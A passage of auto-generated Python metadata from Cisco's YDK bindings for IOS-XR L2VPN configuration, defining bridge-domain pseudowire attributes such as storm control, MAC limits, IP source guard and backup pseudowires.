'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
False,
[
_MetaInfoClassMember('bdpw-storm-control-type', REFERENCE_LIST, 'BdpwStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
[], [],
''' Storm Control Type
''',
'bdpw_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
False,
[
_MetaInfoClassMember('bd-pw-static-mac-address', REFERENCE_LIST, 'BdPwStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'bd_pw_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic IP source guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Pseudowire MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
False,
[
_MetaInfoClassMember('pseudowire-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' MAC Aging Time
''',
'pseudowire_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pseudowire_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
False,
[
_MetaInfoClassMember('pseudowire-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Bridge Access Pseudowire MAC address
limit enforcement action
''',
'pseudowire_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on a Bridge
Access Pseudowire after which MAC limit
action is taken
''',
'pseudowire_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Bridge Access Pseudowire
''',
'pseudowire_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Bridge-domain Pseudowire MAC
configuration mode
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging', REFERENCE_CLASS, 'PseudowireMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pseudowire_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable MAC Learning
''',
'pseudowire_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit', REFERENCE_CLASS, 'PseudowireMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pseudowire_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'pseudowire_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-secure', REFERENCE_CLASS, 'PseudowireMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
[], [],
''' MAC Secure
''',
'pseudowire_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
False,
[
_MetaInfoClassMember('bd-pw-split-horizon-group', REFERENCE_CLASS, 'BdPwSplitHorizonGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
[], [],
''' Split Horizon Group
''',
'bd_pw_split_horizon_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domain-backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bridge_domain_backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
False,
[
_MetaInfoClassMember('bridge-domain-backup-pseudowire', REFERENCE_LIST, 'BridgeDomainBackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
[], [],
''' Backup pseudowire configuration
''',
'bridge_domain_backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bd_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-mpls-static-labels', REFERENCE_CLASS, 'BdPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'bd_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-split-horizon', REFERENCE_CLASS, 'BdPwSplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
[], [],
''' Split Horizon
''',
'bd_pw_split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-static-mac-addresses', REFERENCE_CLASS, 'BdPwStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'bd_pw_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bdpw-storm-control-types', REFERENCE_CLASS, 'BdpwStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
[], [],
''' Storm Control
''',
'bdpw_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-backup-pseudowires', REFERENCE_CLASS, 'BridgeDomainBackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
[], [],
''' List of pseudowires
''',
'bridge_domain_backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai', REFERENCE_CLASS, 'PseudowireDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
[], [],
''' Access Pseudowire Dynamic ARP Inspection
''',
'pseudowire_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding
''',
'pseudowire_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding Unknown
Unicast
''',
'pseudowire_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pseudowire_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-ip-source-guard', REFERENCE_CLASS, 'PseudowireIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
[], [],
''' IP Source Guard
''',
'pseudowire_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac', REFERENCE_CLASS, 'PseudowireMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
[], [],
''' Bridge-domain Pseudowire MAC
configuration commands
''',
'pseudowire_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a MLD Snooping profile
''',
'pseudowire_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-profile', REFERENCE_CLASS, 'PseudowireProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
[], [],
''' Attach a DHCP profile
''',
'pseudowire_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
False,
[
_MetaInfoClassMember('bd-pseudowire', REFERENCE_LIST, 'BdPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
[], [],
''' Pseudowire configuration
''',
'bd_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport',
False,
[
_MetaInfoClassMember('transport-name', ATTRIBUTE, 'str' , None, None,
[], ['(RSVP_TE)'],
''' Transport Type
''',
'transport_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('attribute-set-name', ATTRIBUTE, 'str' , None, None,
[(0, 64)], [],
''' Multicast P2MP TE Attribute Set Name
''',
'attribute_set_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'transport',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports',
False,
[
